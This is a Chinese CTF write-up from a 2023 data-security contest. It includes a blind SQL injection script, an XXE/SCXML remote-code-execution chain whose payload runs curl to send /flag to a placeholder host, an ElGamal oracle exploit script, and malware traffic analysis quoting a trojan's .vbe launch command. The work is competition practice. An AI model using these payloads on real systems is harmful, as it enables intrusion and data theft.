2023 数字中国创新大赛网络数据安全产业人才挑战赛 数据安全 数据分析 敏感数据泄露识别 Writeup

前记

博客太久没写了，一直想更新 Yubikey 的教程，但是每次新建 Markdown 都没动力继续写，想来想去还是该写写了，再不写就真的要长蜘蛛网了，所以把前几天的比赛也正好补下 Writeup，正好打进线下了，可以去福州摸摸鱼，挺好

最后欢迎来 NSS 平台做题呀~ https://www.nssctf.cn/

数据安全 Writeup

签到挑战 @Xenny

按照hint传个xxe即可

端口管理系统 @atao & @Xenny

一个登录框，存在SQL注入。

使用Payloadadmin'and(1)--+返回99999；使用Payloadadmin'and(0)--+返回0。由此可以获取admin用户的密码，脚本如下（吐槽一下请求时快时慢

import requests

burp0_url = "http://eci-2zecpi6e3euemjqw2s9b.cloudeci1.ichunqiu.com:80/login.php"
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://eci-2zeer6871ouxogqf6i4h.cloudeci1.ichunqiu.com", "Connection": "close", "Referer": "http://eci-2zeer6871ouxogqf6i4h.cloudeci1.ichunqiu.com/", "Upgrade-Insecure-Requests": "1"}
flag = ''

for j in range(1, 11):
    for i in range(32, 128):

        burp0_data = {"Username": "admin'and(substr(Password,{},1)='{}')-- ".format(j, chr(i)), "Password": "aaa1"}
        print burp0_data["Username"]
        r = requests.post(burp0_url, headers=burp0_headers, data=burp0_data)
        if "99999" in r.text:
            flag += chr(i)
            print flag
            break
        if i == 127:
            print flag
            exit()

获得Password为4uO8TivJHSGnTMV9hUS4qQKn7TRFPhHQt29ylDmRtsqVMtxCFpNysorMPdk9T26G 通过/www.zip读取源码，发现存在AES加密，lib.php运行得到key和iv，然后ECB解密获得flag{9b39060c-119b-485a-866c-6d1bb069d3d1}

XxME @atao

下载源码进行查看，发现/object路由调用scxml这个库。这个东西以前有写过RCE利用。查看：https://www.yuque.com/yuqueyonghukcxcby/wwdc80/xpc19o7w7behskgs?singleDoc

并且我的payload并没有用到script可以说直接Bypass了

接着看看/xxe路由，就是一个xxe漏洞。通过 https://xz.aliyun.com/t/3357#toc-14 可知，利用xxe可以上传临时缓存文件文件

利用如下脚本，上传一个socket连接的

server.py

import sys 
import time 
import threading 
import socketserver 
from urllib.parse import quote 
import http.client as httpc 

listen_host = '0.0.0.0' 
listen_port = 8082
jar_file = sys.argv[1]

class JarRequestHandler(socketserver.BaseRequestHandler):  
    def handle(self):
        http_req = b''
        print('New connection:',self.client_address)
        while b'\r\n\r\n' not in http_req:
            try:
                http_req += self.request.recv(4096)
                print('Client req:\r\n',http_req.decode())
                jf = open(jar_file, 'rb')
                contents = jf.read()
                headers = ('''HTTP/1.0 200 OK\r\n'''
                '''Content-Type: application/java-archive\r\n\r\n''')
                self.request.sendall(headers.encode('ascii'))

                self.request.sendall(contents[:-1])
                time.sleep(45)
                print(30)
                self.request.sendall(contents[-1:])

            except Exception as e:
                print ("get error at:"+str(e))


if __name__ == '__main__':

    jarserver = socketserver.TCPServer((listen_host,listen_port), JarRequestHandler) 
    print ('waiting for connection...') 
    server_thread = threading.Thread(target=jarserver.serve_forever) 
    server_thread.daemon = True 
    server_thread.start() 
    server_thread.join()

1.xml

<scxml xmlns="http://www.w3.org/2005/07/scxml" version="1.0">
    <datamodel>
            <data id="flag" expr="''.class.forName('java.lang.Runtime').getRuntime().exec('curl -F xx=@/flag http://xxx/')"></data>
    </datamodel>
</scxml>

然后使用命令python3 server.py 1.xml起个监听 配置 2.xml 用于远程加载1.xml文件

<!DOCTYPE convert [ 
<!ENTITY  remote SYSTEM "jar:http://xxx/2.xml!/1.xml">
]>
<convert>&remote;</convert>

配置 3.xml 用于查看临时文件名

请求 2.xml

然后读取缓存名

然后访问 /object 路由进行利用

flag为flag{3f459b88-db6d-403f-806e-5e40aed7caf0}

key @WDLJT

打开靶机，查看源码，发现pdf文件，访问

发现用户dcic,6位弱口令,尝试爆破,得到密码000000,登录

发现url中存在id参数,尝试遍历,当id=7的时候出现flag

math_exam @Xenny

好久没做RSA，很生疏，卡了好久，其实每个challenge都是给了一个pq的关系式，嗯解方程即可。

from Crypto.Util.number import *
from sympy.abc import p, q
from sympy.solvers import solve
# e = 65537
# c = 112742443814287255411540092433156061065388404049949520959549377871297566383025041892192679147481155020865118811016470498351633875090973546567374001852295013083192495299811476604405637385307524194793969533646755764136014187430115618114840780368311166911900457224593131166970676797547489278410997707815915932756
# n = 121127425328043404860413278637978444801342472819958112597540188142689720655042880213001676368390521140660355813910726809125567752172921410143437643574528335234973793653775043030021036875866776532570781661875022102733555943967261003246543180935987772711036868216508554536086688819118597075508026787867088355603
# leak = 216638862637129382765636503118049146067015523924032194492700294200289728064297722088882791754351329407138196573832392846467607399504585045028165699421278

# res = solve([2*p-2*(q-1)-leak, p*q-n], [p, q])
# p, q = res[1]

# phi = int((p-1)*(q-1))
# d = inverse(e, phi)
# m1 = pow(c, d, n)
# print(long_to_bytes(m1))

# e = 65537
# c = 7964477910021153997178145480752641882728907630831216554750778499596527781702830885213467912351097301767341858663701574005489585561370961723264247818377063081744522471774208105250855114831033452448184392499682147532404562876275189577321587660597603848038824026981539659156304028998137796242331160312370913038
# n = 140571013522095816880929287025269553867630639381779595547026503691829940612178900269986625350464874598461222087427155791855120339533208468121389480964471710028253589422629569889402475311387750348466199387760629889238062977271925350490110043385800605640905324122017637306715108727700910035925728362455954862209
# leak = 58442382248753295429370894053397615609981110383986887405127350139482893508400422595729520437678203735054593866306478994471465948872565590901376309380029015549809468112086393107585011072503638322671608471684607214064187044372418770555236721845694224676090744181562673509234801011420696349507624867568099759003

from tqdm import tqdm

from gmpy2 import *
from multiprocessing import Pool

# def work(s):
#     start,end = s
#     from sympy.abc import p,q
#     for k in tqdm(range(start, end)):
#         res = solve([e*(leak-p-q) - 1 - k*(p-1)*(q-1), p*q-n], [p,q])
#         if res:
#             print(res)
#             exit()

# if __name__ == '__main__':
#     pool = Pool(16)
#     cnt = 16
#     xxx = 20000
#     pp = []
#     pool.map(work, [(xxx + (e-xxx)//cnt * i, xxx + (e-xxx)//cnt * (i+1)) for i in range(cnt)])

#     pool.close()
#     pool.join()
# p,q = 11313966409861631039478595568321463053854736981799251879142366634260663826785753600795543739453234641363969055017418412140488571150961964028137302877217043, 12424556378351046371185161277482905943559947548618363169705793593589566182588523613116377606937486152883486532821967293124238036618192092197776877669969563

# phi = (p-1)*(q-1)

# d = inverse(e, phi)
# m2 = pow(c, d, n)
# print(long_to_bytes(m2))

e = 65537
c = 54161995127842474543974770981473422085334044100057089719350274921419091368361244533281599379235907845996678762379778310924192757650322930707785543132446159092950451255660204858292974657119337026589911330412367633761103944916751660957776230135927005700707688661350641600954072696774954805514477330339449799540
n = 88207747624007183083381863279444163105330473097729276113333026679597864128605555600000789783468271680476780366740448641311570797876037993255307716167149079618302706650018518487351604778857406170722209469765782625409279109832638886179654096975665134276856272488090272822541461702907181545730309689190333058151
leak = 19596671928335648228117128090384865424885102632642665068992144783391306491716530155291726644158221224616817878768426330717188403310818678195631582453246848

from sympy.solvers import solve
res = solve([p+q-leak, p*q-n], [p,q])

p,q = int(res[0][0]), int(res[0][1])
d = inverse(e, (p-1)*(q-1))
phi = int((p-1)*(q-1))
m3 = pow(c, d, n)
print(long_to_bytes(m3))

lose the key @Xenny

Elgamal就是个幌子，其实认真看代码搞懂逻辑就会做了，有加密和解密功能，解密得到特定值可以得到flag，我们只需要解密一次先得到g^i然后即可得到g^{xr}，然后就能构造b=g^{xy}*z从而让解密函数得到z

# from Crypto.PublicKey import ElGamal
# from Crypto.Util.number import bytes_to_long
# d = []
# k = ElGamal.construct(k)
z = 62108754904287032821971381232956885052769068054607609275042182309040123248979381249587936612457114553082984085473302992025047447258976388732555778861072247007820649687902442248057135518944999341930795894210983350234495243479752339988814594642849784670120645449023408944862789781184747815252870664480503695731

from pwn import *

context.log_level = 'debug'
io = remote('101.200.235.163', 25178)

io.recvline()
io.sendlineafter('> ', '1')
line = io.recvline().decode().strip()
p,g,y = list(map(int, line[1:-1].split(',')))

# i_list = ['富强','民主','文明','和谐', '自由','平等','公正','法治','爱国','敬业','诚信','友善']

def inverse(u, v):
    """The inverse of :data:`u` *mod* :data:`v`."""

    u3, v3 = u, v
    u1, v1 = 1, 0
    while v3 > 0:
        q = u3 // v3
        u1, v1 = v1, u1 - v1*q
        u3, v3 = v3, u3 - v3*q
    while u1<0:
        u1 = u1 + v
    return u1

io.sendlineafter('> ', '2')
y2 = int(io.recvline().decode().strip())

io.sendlineafter('> ', '3')
io.sendlineafter('b> ', str(y2))

ix = io.recvline().decode().strip()

ss = [252542145903802, 253646036318395, 253534199519374, 252417592045712, 255669385532593, 252585750015369, 252362294209955, 253658988458683, 254574286183357, 253530525186202, 255840915603361, 252404690163332]
s = ['富强','民主','文明','和谐', '自由','平等','公正','法治','爱国','敬业','诚信','友善']
i = ss[s.index(ix)]
gi = pow(g, i, p)

gxy = y2 * inverse(gi, p)

io.sendlineafter('> ', '3')
io.sendlineafter('b> ', str(z*gxy))

io.interactive()

数据分析 Writeup

区块链威胁分析 @WDLJT

第一问

全局搜索 Identi

我才不会说我一开始没用全局搜索然后翻 hex 翻了20分钟

即可得到 W58CYKFH67

第二问

将压缩包放到 virustotal 分析,得到这个 C2 的家族 - trojan.tradertraitor/nukesped

经查询是该组织

fernet @WDLJT

第一问

经wireshark追踪流分析,获取如下key: 截图寄了，懒得重新截图了总的来说就是 Server 端和 Client 一个 key 一个 token

n6IcHjmQUNOd6TxOkV6WRigEPUZFkO2TIu8cS6MRyrE=

Aj0S2EgsjOFd_JRsOjcBB_5-fZ1H-9tZVF67-qOWCbw=

Z-Ur0AYZQ9-nNO_O6j5B1slASR-YR2tsssycqHNc_so=

eBp92fUD7Lk_6qXR2pIjFt3sBH-lW0ul830S-sO6QCQ=

Erj5UoZfpxT47Bjpg8qg1XmMCKZyKBj1bJ0otszVZPk=

qkwNBcGK7ZcOrlKKcflivlyiatdAsb2u_sH_-IB5R_Y=

0smJ2LvvnQonNICFpjOF8CeuOcMIuYLNVbCDucWSVaw=

第二问

根据压缩包内残破.py文件可知，该加密方式为fernet加密

并且根据 gAAAAA 也能判断是 fernet 的 token

解题脚本如下：

from cryptography.fernet import Fernet

# key = Fernet.generate_key()
key = b'此处填写key'

f = Fernet(key)

token = b'此处填写token'

f.decrypt(token)

print(f.decrypt(token).decode('utf-8'))

解密内容

I'm a hacker.
This system has been hacked by me
Next, I want to obtain some data
姓名｜性别｜身份证号｜电话｜a|b|c
张三,男,340303202304025872,13333333333
性别｜姓名｜身份证号｜电话｜a|b|c
女,小美,500112202304217984,12222222222,111111111111,22222,333333
bye??
no!I finally want to transmit a flag
data:image/png;base64,这是一串 base64 太长了不想放了
Have fun in Digital China

根据解密内容，按照题目意思，太难过逗号更换为下划线，将张三,男,340303202304025872,13333333333“”进行md5后即为flag

第三问

将得到的 data:image 的 base64 解码后，得到以下图片

上图有类似 flag 字样，使用 stegsolve 检索图层，得到 flag，然后解码，然后我解出这玩意一血还没出，读 flag 读了快 10 分钟，读完就四血了，一血在五分钟前，难蚌。

C2流量分析 @WDLJT

第一问

TCP追踪流，发现16号流存在木马程序流量

payload 完整下载地址即为 http:// + host + path

为了防止误触（因为确实他有恶意行为，虽然大概率会被杀软 gank 掉）我这里就放 VT 的分析链接了：https://www.virustotal.com/gui/url/c9243a6afc614f3e92014b031b3f84d0e3b94efc5aba55c0097517887235828a

第二问

将该流保存为 bin 文件，提取木马文件原始数据，经过 SHA256 得

不过我一开始取巧，因为我 Wireshark 导出的时候一直忘记用 bin 一直用 text 然后就有一堆 0x2E，然后 hash 算不对，把这个丢 VT 上面，发现这个是实际存在的马，然后那个 sha256 居然不是题目的 sha256 ，题目可能是去了毒或者塞了考点什么的，hash 对不上，VT 出来的是这个：e652f9621cb00e0e3b3aa6935bdfa3c6826e3b53facdc55558692e7811dc4fc4

将该值大写，即为本题答案

第三问

将得到的bin文件放入IDA进行逆向分析，查字符串得到该值

向上追踪，得到该应用程序的执行流

得到下一条命令为 cmd.exe /c C:\Users\Public\Documents\2022060125.vbe

第四问

经过分析，需要 base64 解码的 cmd 命令个数为三条，然后虽然他是第四问，但是这个是真的能直接看流量看到的 base64 所以第一解就是做的这个题

挑战区1 Writeup

敏感数据泄露识别 @Xenny

import os
import re
from tqdm import tqdm
import json
data = {}
'''
    filename: {
        data: [],
        meta: {
            header: [],
            filename: '',
            length: 0
        },
        p_phone: {}
    }
'''

varibs = ['phone', 'cert_no', 'school', 'email', 'bank_card']
result = []
valid_phone_prefix = [334,335,336,337,338,339,347,350,351,352,357,358,359,378,382,383,384,387,388,330,331,332,345,355,356,385,386,376,375,333,349,353,380,381,389,377,399,391,393,395,398]
valid_bank_card_prefix = [922,883,165,221,880,584,768,908,197,130,956,500,723,881,886,839,922,335,706,205,132,123,127,766,110,803,322,844,130,641,328,883,667,339,337,794,325,880,571,397,123,958,758,203,291,745,842,981,224,861,839,613,950,787,295,391,702,612,967,618,704,974,136,592,862,917,781,278,662,895,791,856,189,780,211,898,268,961,851,131,581,145,969,730,708,693,763,275,273,615,333,113,890,981,662,338,692,571,776,662,724,847,106,903,978,941,859,929,233,632,897,158,593,991,684,668,617,597,933,102,739,906,728,570,715,129,924,336,751,282,699,286,982,194,918,665,917,972,937,134,962,790,173,186,118,115,873,874,388,213,917,740,290,398,172,272,264,641,273,773,380,764,586,217,125,916,293,212,848,721,937,122,331,119,507,250,137,837,265,619,795,953,326,746,917,562,329,765,132,505,792,923,776,747,161,856,229,997,149,173,980,179,862,263,679,359,234,109,971,139,705,323,684,572,276,948,991,899,738,139,306,202,791,706,299,207,782,500,617,612,118,727,993,389,119,261,306,979,931,902,239,791,199,958,661,958,804,597,887,167,142,187,237,274,271,878,715,619,962,217,399,719,899,833,239,665,889,207,141,175,987,908,251,949,229,218,730,702,901,179,330,680,184,678,218,569,384,211,906,147,948,113,729,787,115,194,218,946,141,293,701,266,219,562,272,798,263,862,206,926,938,203,768,141,128,111,906,844,711,509,165,166]

什么你想要完整脚本，完整脚本好像被不明势力给干扰了，不如来看看这里吧 https://www.ctfer.vip/note/set/1650

5YhN5YzV5Y2t6X+y5YvA5Yln55ls55dR5bBm5bdX6Y+M546c5bFC6Xrw5Lr65c2y5MPa77lZ5nJ95MPa5crv54F26Xrw5Lr65c2y5YdT5oPk57hM5Y2t5MPaPzEyMvOcp192LJkcMS9wMKW0K25iXT4cBtbtVPNtqzSlVQ0tJmpfBFjkZPj1YQtfAPjlYQRfAvjmYQpfBFjkZPj1YQtfAPjlKDbtVPNtqzSlK2yxCIfaZFpfWmNaYPq4WljaBFpfWmtaYPp3WljaAvpfWmHaYPp0WljaZlpfWmVaKDbXVPNtVUA1oFN9VQNXVPNtVNbtVPNtpUWcoaDXPvNtVPOzo3VtnFOcovOlLJ5aMFtjYQR3XGbXVPNtVPNtVPOmqJ0tXm0tnJ50XT5onI0cXaMupygcKDbtVPNtp3IgVPH9VQRkPtbtVPNtpzI0qKWhVUMupy9cMSgmqJ1qVQ09VT5oZGqqYzkiq2IlXPxXPzEyMvOzo3WgLKEsqzSlXUMuoPjtMz9loJS0XGbXVPNtVTyzVTMipz1uqPN9CFNapTuiozHaBtbtVPNtVPNtVUWyplN9VUWyYzMcozEuoTjbW1jbC1jeCmt/Aw9pXG8tClupMUfmsFxhClupMUf0sFxhClupMUf0sFypXQ84CmL/KPx/WljtqzSfXDbtVPNtVPNtVUWyqUIlovNaWl5do2yhXUWyp1fjKFxXVPNtVTIfp2H6PvNtVPNtVPNtpzI0qKWhVUMuoNbXMTIzVUqipzgsMz9lK3EuLzkyXUOuqTtfVTMcoTIhLJ1yXGbXVPNtVTqfo2WuoPOxLKEuPvNtVPOxLKEuJ2McoTIhLJ1yKFN9VUfXVPNtVPNtVPNaMTS0LFp6VR5iozHfPvNtVPNtVPNtW21yqTRaBvO7PvNtVPNtVPNtVPNtVPqznJkyozSgMFp6VTMcoTIhLJ1yPvNtVPNtVPNtsDbtVPNtsDbXVPNtVUqcqTtto3OyovujLKEbYPOyozAiMTyhMm0aqKEzYGtaXFOuplOzBtbtVPNtVPNtVUWiqlN9VTLhpzIuMTkcozHbXF5mqUWcpPtcPvNtVPNtVPNtpz93VQ0tpz93YaAjoTy0XPpfWlyoZGcqPtbtVPNtVPNtVTEuqTSoMzyfMJ5uoJIqJlqgMKEuW11oW2uyLJEypvqqVQ0tpz93YzAipUxbXDbXVPNtVPNtVPOsMPN9VSgqPtbtVPNtVPNtVTMipvOfnJ5yVTyhVTLhpzIuMTkcozImXPx6PvNtVPNtVPNtVPNtVTkcozHtCFOfnJ5yYaA0pzyjXPxhp3OfnKDbWljaXIfkBy0XVPNtVPNtVPNtVPNtK2DhLKOjMJ5xXTkcozHcPvNtVPNtVPNtPvNtVPNtVPNtoT5aVQ0toTIhXS9xXDbtVPNtVPNtVTEuqTSoMzyfMJ5uoJIqJlqxLKEuW10tCFOsMP5wo3O5XPxXVPNtVPNtVPOxLKEuJ2McoTIhLJ1yKIfaoJI0LFqqJlqfMJ5aqTtaKFN9VTkhMjbtVPNtVPNtVNbtVPNtVPNtVTMipvOcozEyrPjtnKEyoFOcovOyoaIgMKWuqTHbpz93XGbXVPNtVPNtVPNtVPNtK2DtCFO7sDbtVPNtVPNtVPNtVPOcMvOcqTIgYzkiq2IlXPxtnJ4tqzSlnJWmBtbtVPNtVPNtVPNtVPNtVPNtMz9lVTxtnJ4tpzShM2HboT5aXGbXVPNtVPNtVPNtVPNtVPNtVPNtVPOsMSgzo3WgLKEsqzSlXTEuqTSoMzyfMJ5uoJIqJlqxLKEuW11onI1onJ5xMKuqYPOcqTIgYzkiq2IlXPxcKFN9VTxXVPNtVPNtVPNtVPNtMTS0LIgznJkyozSgMI1oMvqjK3gcqTIgYzkiq2IlXPy9W10tCFOsMP5wo3O5XPxXPzEyMvOfo2AuqTIsMzyfMFu2LJjfVPO0rKOyXGbXVPNtVTqfo2WuoPOxLKEuPvNtVPOzqzSfVQ0tMz9loJS0K3Mupvu2LJjfVUE5pTHcPvNtVPOzo3Vtn2I5VTyhVTEuqTR6PvNtVPNtVPNtnJLtqUyjMFOcovOxLKEuJ2gyrI1oW21yqTRaKIfanTIuMTIlW106PvNtVPNtVPNtVPNtVTyxrPN9VTEuqTSon2I5KIgzW3Osr3E5pTI9W10hM2I0XTM2LJjfVR5iozHcPvNtVPNtVPNtVPNtVUOiplN9VTEuqTSon2I5KIfaoJI0LFqqJlqbMJSxMKVaKF5cozEyrPu0rKOyXDbtVPNtVPNtVPNtVPOcMvOcMUttnKZtoz90VR5iozH6PvNtVPNtVPNtVPNtVPNtVPOlMKE1pz4tXTgyrFjtqUyjMFjtMTS0LIgeMKyqJlqxLKEuW11onJE4KIgjo3AqXDbtVPNtVPNtVPNtVPNtVPNtPtcxMJLtoTIun3qipzgsMz9lK3EuLzkyXUOuqTtfVTMcoTIhLJ1yXGbXVPNtVTqfo2WuoPOlMKA1oUDXVPNtVUqcqTtto3OyovujLKEbYPOyozAiMTyhMm0aqKEzYGtaXFOuplOzBtbtVPNtVPNtVUWiqlN9VTLhpzIuMTkcozHbXF5mqUWcpPtcPvNtVPNtVPNtpz93VQ0tpz93YaAjoTy0XPpfWlyoZGcqPtbtVPNtVPNtVS9xVQ0tJ10XPvNtVPNtVPNtMz9lVTkcozHtnJ4tMv5lMJSxoTyhMKZbXGbXVPNtVPNtVPNtVPNtoTyhMFN9VTkcozHhp3ElnKNbXF5mpTkcqPtaYPpcPvNtVPNtVPNtVPNtVS9xYzSjpTIhMPufnJ5yXDbtVPNtVPNtVTkhMlN9VTkyovusMPxXPvNtVPNtVPNtMz9lVTyhMTI4YPOcqTIgVTyhVTIhqJ1ypzS0MFulo3pcBtbtVPNtVPNtVPNtVPOcMvOcqTIgYzkiq2IlXPxtnJ4tqzSlnJWmBtbtVPNtVPNtVPNtVPNtVPNtMz9lVTxtnJ4tpzShM2HboT5aXGbXVPNtVPNtVPNtVPNtVPNtVPNtVPOlMKZtCFOfo2AuqTIsMzyfMFusMSgcKIgcozEyrPfkKFjtnKEyoF5fo3qypvtcXDbtVPNtVPNtVPNtVPNtVPNtVPNtVTyzVUWyplOcplOho3DtGz9hMGbXVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVlOjpzyhqPulMKZcPvNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVUWyp3IfqP5upUOyozDbWlNaYzcinJ4bXTMcoTIhLJ1yYPxepzImXFNeVPqpovpcPtcxMJLtpTSlp2IsL29hqTIhqPufnJ5yplx6PvNtVPOcMvOfMJ4boTyhMKZcVQ09VQR6PvNtVPNtVPNtnJLtoTyhMKAoZS1oZS0tCG0tW3faBtbtVPNtVPNtVPNtVPOfnJ5yplN9VTkcozImJmOqYaA0pzyjXPxhp3OfnKDbWlO7WlxXVPNtVPNtVPNtVPNtPvNtVPNtVPNtVPNtVS9xVQ0tJjbtVPNtVPNtVPNtVPNtVPNtnaAiov5fo2SxplufnJ5yp1fjKFxXVPNtVPNtVPNtVPNtKDbtVPNtVPNtVPNtVPOzo3VtoTyhMFOcovOfnJ5yp1fkBy06PvNtVPNtVPNtVPNtVPNtVPOsMP5upUOyozDbnaAiov5fo2SxpltarlpeoTyhMFxcPvNtVPNtVPNtVPNtVUWyqUIlovOsMPjtW2cmo24aPtbtVPNtVPNtVTyzVTkcozImJmOqYzAiqJ50XPswtVVaXFN+VQRjZQbXVPNtVPNtVPNtVPNtpzI0qKWhVTkcozImJmOqYPNaoTyhMFpXPvNtVPNtVPNtpzI0qKWhVR5iozHfVR5iozHXPvNtVPOcMvOfMJ4boTyhMKAoZS0hp3OfnKDbWlNaXFxtCvNkBtbtVPNtVPNtVTuyLJEypvN9VTkcozImJmOqYaA0pzyjXPxhp3OfnKDbWlNtVPpcPvNtVPNtVPNtoTyhMFN9VSgqPvNtVPNtVPNtMz9lVTxtnJ4tpzShM2HbZFjtoTIhXTkcozImXFx6PvNtVPNtVPNtVPNtVTkcozHhLKOjMJ5xXTkcozImJ2yqYaA0pzyjXPxhp3OfnKDbWlNtVPNaXFxXVPNtVPNtVPNXVPNtVPNtVPOlMKE1pz4trjbtVPNtVPNtVPNtVPNanTIuMTIlWmbtnTIuMTIlYNbtVPNtVPNtVPNtVPNaMTS0LFp6VTkcozHfPvNtVPNtVPNtsFjtW3EuLzkyWjbtVPNtPvNtVPOcMvOfMJ4boTyhMKAoZS0hp3OfnKDbWljaXFxtCvNkBtbtVPNtVPNtVTuyLJEypvN9VTkcozImJmOqYaA0pzyjXPxhp3OfnKDbWljaXDbtVPNtVPNtVTkcozHtCFOoKDbtVPNtVPNtVTMipvOcVTyhVUWuozqyXQRfVTkyovufnJ5yplxcBtbtVPNtVPNtVPNtVPOfnJ5yYzSjpTIhMPufnJ5yp1gcKF5mqUWcpPtcYaAjoTy0XPpfWlxcPvNtVPNtVPNtPvNtVPNtVPNtpzI0qKWhVUfXVPNtVPNtVPNtVPNtW2uyLJEypvp6VTuyLJEypvjXVPNtVPNtVPNtVPNtW2EuqTRaBvOfnJ5yYNbtVPNtVPNtVU0fVPq0LJWfMFpXVPNtVUWyqUIlovOBo25yYPOBo25yPtcxMJLtpTSlp2IsnKEyoFu2LJjcBtbtVPNtpzImVQ0tpzHhMzyhMTSfoPtaXSjbC1jeCmt/Aw9pXG8tClupMUfmsFxhClupMUf0sFxhClupMUf0sFypXQ84CmL/KPx/XFpfVUMuoPxXPvNtVPOcMvOlMKZ6PvNtVPNtVPNtnJLtnJ50XUWyp1fjKIfkKFxtnJ4tqzSfnJEspTuiozIspUWyMzy4BtbtVPNtVPNtVPNtVPOlMKE1pz4tpzImJmOqJmOqYPNapTuiozHaPvNtVPNXVPNtVNbtVPNtpzImVQ0tpzHhMzyhMTSfoPulWluoLF16DF1nZP05Kl1qXlt/ByjhJ2RgrxRgJwNgBI8gKFfcXxOoLF16DF1nZP05YI0eXQ86KP5oLF16DF1nZP05YI0eXFcpYyguYKcqrmVfAa0cWljtqzSfXDbXVPNtVTyzVUWypmbXVPNtVPNtVPOlMKE1pz4tpzImJmOqYPNaMJ1unJjaPvNtVPNXVPNtVTMipvO3VTyhVSfa5n2z5dPuWljtW+Jxc+JgcvpfVPsyenocznVaYPNa5Yvg5n2zWljtW+Jjw+JgcvpfVPsyhomyuY/yz60aYPNa5M+56X6g5Yvg5o+QWljtW+JVuhzQdPpfVPsyvVozbXRaKGbXVPNtVPNtVPOcMvO2LJjhMJ5xp3qcqTtbqlx6PvNtVPNtVPNtVPNtVUWyqUIlovO2LJjfVPqmL2uio2jaPtbtVPNtqzSfVQ0tpzHhMzyhMTSfoPtaJ15pqGEyZQNgKUH5MzR1KFfaYUMuoPxXPvNtVPOcMvOho3DtqzSfBtbtVPNtVPNtVUWyqUIlovOBo25yYPOBo25yPvNtVPO2LJjtCFO2LJkoZS0XVPNtVUZtCFNaWjbtVPNtMz9lVTxtnJ4tqzSfBtbtVPNtVPNtVTyzVT9lMPtaZPpcVQj9VT9lMPucXFN8CFOipzDbWmxaXGbXVPNtVPNtVPNtVPNtplNeCFOcPvNtVPNtVPNtMJkcMvOfMJ4bplxtCG0tZGptLJ5xVTxtCG0tW3taVT9lVTxtCG0tW1taBtbtVPNtVPNtVPNtVPOmVPf9VTxXVPNtVPNtVPNXVPNtVTyzVQRmVQj9VTkyovumXFN8CFNkAmbXVPNtVPNtVPOcMvOcoaDbp1f6Z10cVTyhVUMuoTyxK2WuozgsL2SlMS9jpzIznKt6PvNtVPNtVPNtVPNtVUWyqUIlovO2LJjfVPqvLJ5eK2AupzDaPvNtVPOyoTyzVTkyovumXFN9CFNkBQbXVPNtVPNtVPOcMvNkZlN8CFOcoaDbp1fkZQbkZy0cVQj9VQV0BtbtVPNtVPNtVPNtVPOlMKE1pz4tqzSfYPNaL2IlqS9holpXPvNtVPOlMKE1pz4tGz9hMFjtGz9hMDbXMTIzVUqipzgsMz9lK3E4qPujLKEbYPOznJkyozSgMFx6PvNtVPOaoT9vLJjtpzImqJk0PvNtVPOxLKEuJ2McoTIhLJ1yKFN9VUfXVPNtVPNtVPNaMTS0LFp6VR5iozHfPvNtVPNtVPNtW21yqTRaBvO7PvNtVPNtVPNtVPNtVPqznJkyozSgMFp6VTMcoTIhLJ1yPvNtVPNtVPNtsDbtVPNtsDbtVPNtq2y0nPOipTIhXUOuqTtfVTIhL29xnJ5aCFq1qTLgBPpcVTSmVTL6PvNtVPNtVPNtoTyhMKZtCFOzYaWyLJEfnJ5ypltcPvNtVPNXVPNtVTAioaEyoaDfqUyjMFN9VUOupaAyK2AioaEyoaDboTyhMKZcPtbtVPNtnJLtqUyjMFN9CFNaqTSvoTHaBtbtVPNtVPNtVTEuqTSoMzyfMJ5uoJIqJlqgMKEuW11oW2uyLJEypvqqVQ0tL29hqTIhqSfanTIuMTIlW10hL29jrFtcPvNtVPNtVPNtMTS0LIgznJkyozSgMI1oW21yqTRaKIfaoTIhM3EbW10tCFOfMJ4bL29hqTIhqSfaMTS0LFqqXDbtVPNtVPNtVTEuqTSoMzyfMJ5uoJIqJlqxLKEuW10tCFOwo250MJ50JlqxLKEuW10hL29jrFtcPtbtVPNtVPNtVTMipvOcozEyrPjtnKEyoFOcovOyoaIgMKWuqTHbMTS0LIgznJkyozSgMI1oW21yqTRaKIfanTIuMTIlW10cBtbtVPNtVPNtVPNtVPOsMPN9VUg9PvNtVPNtVPNtVPNtVTyzVTy0MJ0hoT93MKVbXFOcovO2LKWcLaZ6PvNtVPNtVPNtVPNtVPNtVPOzo3VtnFOcovOlLJ5aMFuxLKEuJ2McoTIhLJ1yKIfaoJI0LFqqJlqfMJ5aqTtaKFx6PvNtVPNtVPNtVPNtVPNtVPNtVPNtK2EoMz9loJS0K3MupvuxLKEuJ2McoTIhLJ1yKIfaMTS0LFqqJ2yqJ2yhMTI4KFjtnKEyoF5fo3qypvtcXI0tCFOcPvNtVPNtVPNtVPNtVTEuqTSoMzyfMJ5uoJIqJ2LapS97nKEyoF5fo3qypvtcsFqqVQ0tK2DhL29jrFtcPvNtVPOyoTyzVUE5pTHtCG0tW2cmo24aBtbtVPNtVPNtVTEuqTSoMzyfMJ5uoJIqJlqgMKEuW11oW2uyLJEypvqqVQ0toTymqPuwo250MJ50JmOqYzgyrKZbXFxXVPNtVPNtVPOxLKEuJ2McoTIhLJ1yKIfaoJI0LFqqJlqfMJ5aqTtaKFN9VTkyovuwo250MJ50XDbtVPNtVPNtVNbtVPNtVPNtVTkcozImVQ0tJ10XVPNtVPNtVPOzo3VtoTyhMFOcovOwo250MJ50BtbtVPNtVPNtVPNtVPOsoPN9VSgqPvNtVPNtVPNtVPNtVTMipvOcqTIgVTyhVTEuqTSoMzyfMJ5uoJIqJlqgMKEuW11oW2uyLJEypvqqBtbtVPNtVPNtVPNtVPNtVPNtK2jhLKOjMJ5xXTkcozIonKEyoI0cPvNtVPNtVPNtVPNtVTkcozImYzSjpTIhMPusoPxXVPNtVPNtVPOxLKEuJ2McoTIhLJ1yKIfaMTS0LFqqVQ0toTyhMKZhL29jrFtcPtbtVPNtVPNtVTMipvOcozEyrPjtnKEyoFOcovOyoaIgMKWuqTHbMTS0LIgznJkyozSgMI1oW21yqTRaKIfanTIuMTIlW10cBtbtVPNtVPNtVPNtVPOsMPN9VUg9PvNtVPNtVPNtVPNtVTyzVTy0MJ0h